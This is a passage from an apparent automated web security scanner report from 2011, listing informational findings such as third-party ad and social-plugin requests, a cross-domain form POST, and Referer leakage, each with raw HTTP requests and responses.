Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut=; path=/; domain=.adbrite.com; expires=Sun, 04-Sep-2011 00:57:44 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Sun, 04-Sep-2011 00:57:44 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjS8Za2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:44 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.2. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.166.57
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 25864

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62cae62d2dd7d90452879" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Notre Dame, Michigan stadiums cleared due to storms</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You recommend this</span><span class="connect_widget_not_connected_text"><a 
href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=reuters.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&a
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.133.44
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:45 GMT
Content-Length: 25652

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62caeded57a9c58485022" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Notre Dame, Michigan stadiums cleared due to storms</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You recommend this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span 
class="unlike_span hidden_elem"><
...[SNIP]...

16.3. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.143.43
X-Cnection: close
Date: Sun, 04 Sep 2011 01:03:04 GMT
Content-Length: 8338

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62ce4830e8f7027001287" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">466</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></span>
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.139.47
X-Cnection: close
Date: Sun, 04 Sep 2011 01:03:10 GMT
Content-Length: 8295

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62ce4e069e41f52953044" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">466</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></span>
...[SNIP]...

16.4. http://www.youtube.com/embed/xXftjfC3b5o

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /embed/xXftjfC3b5o

Request 1

GET /embed/xXftjfC3b5o HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18487
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Summary of State Collective Bargaining Agreements - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">


...[SNIP]...
/div>'
});
yt.setConfig({
'PLAYER_CONFIG': {"url": "http:\/\/s.ytimg.com\/yt\/swfbin\/watch_as3-vflUXLhsZ.swf", "min_version": "8.0.0", "args": {"el": "embedded", "fexp": "914025,904531,904427", "use_fullscreen_popup": "1", "is_html5_mobile_device": false, "allow_embed": 1, "allow_ratings": 0, "hl": "en_US", "use_tablet_controls": "0", "eurl": "http:\/\/blogs.sacbee.com\/the_state_worker\/", "iurl": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/hqdefault.jpg", "view_count": 578, "title": "Summary of State Collective Bargaining Agreements", "avg_rating": 0.0, "video_id": "xXftjfC3b5o", "length_seconds": 353, "iurlmaxres": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/maxresdefault.jpg", "enablejsapi": "0", "sk": "UdJ6YnAa5tIWatvcO7n5eGOtBivIhfITC", "use_native_controls": false, "rel": "1", "playlist_module": "http:\/\/s.ytimg.com\/yt\/swfbin\/playlist_module-vflMizWia.swf", "iurlsd": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf"}
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");
yt.setMsg('HTML5_SUBS_TRANSCRIBED', "transcribed");


yt.embed.writeEmbed();
</script>



</body>
</html>

Request 2

GET /embed/xXftjfC3b5o HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:47 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18449
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Summary of State Collective Bargaining Agreements - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">


...[SNIP]...
/div>'
});
yt.setConfig({
'PLAYER_CONFIG': {"url": "http:\/\/s.ytimg.com\/yt\/swfbin\/watch_as3-vflUXLhsZ.swf", "min_version": "8.0.0", "args": {"el": "embedded", "fexp": "914027,903103,913501,913002", "use_fullscreen_popup": "1", "is_html5_mobile_device": false, "allow_embed": 1, "allow_ratings": 0, "hl": "en_US", "use_tablet_controls": "0", "eurl": "", "iurl": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/hqdefault.jpg", "view_count": 578, "title": "Summary of State Collective Bargaining Agreements", "avg_rating": 0.0, "video_id": "xXftjfC3b5o", "length_seconds": 353, "iurlmaxres": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/maxresdefault.jpg", "enablejsapi": "0", "sk": "8YuEOJO4rdnOL3CPCYQ2sismhKkU5W0rC", "use_native_controls": false, "rel": "1", "playlist_module": "http:\/\/s.ytimg.com\/yt\/swfbin\/playlist_module-vflMizWia.swf", "iurlsd": "http:\/\/i1.ytimg.com\/vi\/xXftjfC3b5o\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflNVWyCR.swf"}
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");
yt.setMsg('HTML5_SUBS_TRANSCRIBED', "transcribed");


yt.embed.writeEmbed();
</script>



</body>
</html>

17. Cross-domain POST

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /communities/campusrivalry/topics HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Content-Length: 40492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:og=
...[SNIP]...
<div class="form-row">
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=CampusRivalryCommunityFeed', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input type="text" style="width:140px;margin-bottom:1px;" name="email"/>
...[SNIP]...

18. Cross-domain Referer leakage
There are 32 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


18.1. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3093.150834.0497248606521/B5801515.10

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiSMBgkA9QEBAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 499
Date: Sun, 04 Sep 2011 00:48:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/4/3c/%2a/q;245151336;3-0;0;69806205;3454-728/90;43834042/43851829/1;;~sscs=%3fhttp://r.turn.com/r/formclick/id/WwSFP7EfLiSMBgkA9QEBAA/url/http://www.rightnow.com/index.php?cex=1780Turn"><img src="http://s0.2mdn.net/viewad/3227824/rnBanner_728x90_GreatExpv2.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

18.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3093.150834.0497248606521/B5801515.10

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTMAUAAA-QEBAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 499
Date: Sun, 04 Sep 2011 00:48:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/4/3c/%2a/u;245151336;1-0;0;69806205;3454-728/90;43803591/43821378/1;;~sscs=%3fhttp://r.turn.com/r/formclick/id/RKeRt8A5xTMAUAAA-QEBAA/url/http://www.rightnow.com/cx-score.php?cex=1780Turn"><img src="http://s0.2mdn.net/viewad/3227824/rnBanner_728x90_CEScore.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

18.3. http://ad.doubleclick.net/adj/sacbee_cim/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sacbee_cim/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/sacbee_cim/;dcove=o;share=partnersoldinvite;sz=24x24;dcmt=text/html;ord=1315097366526? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
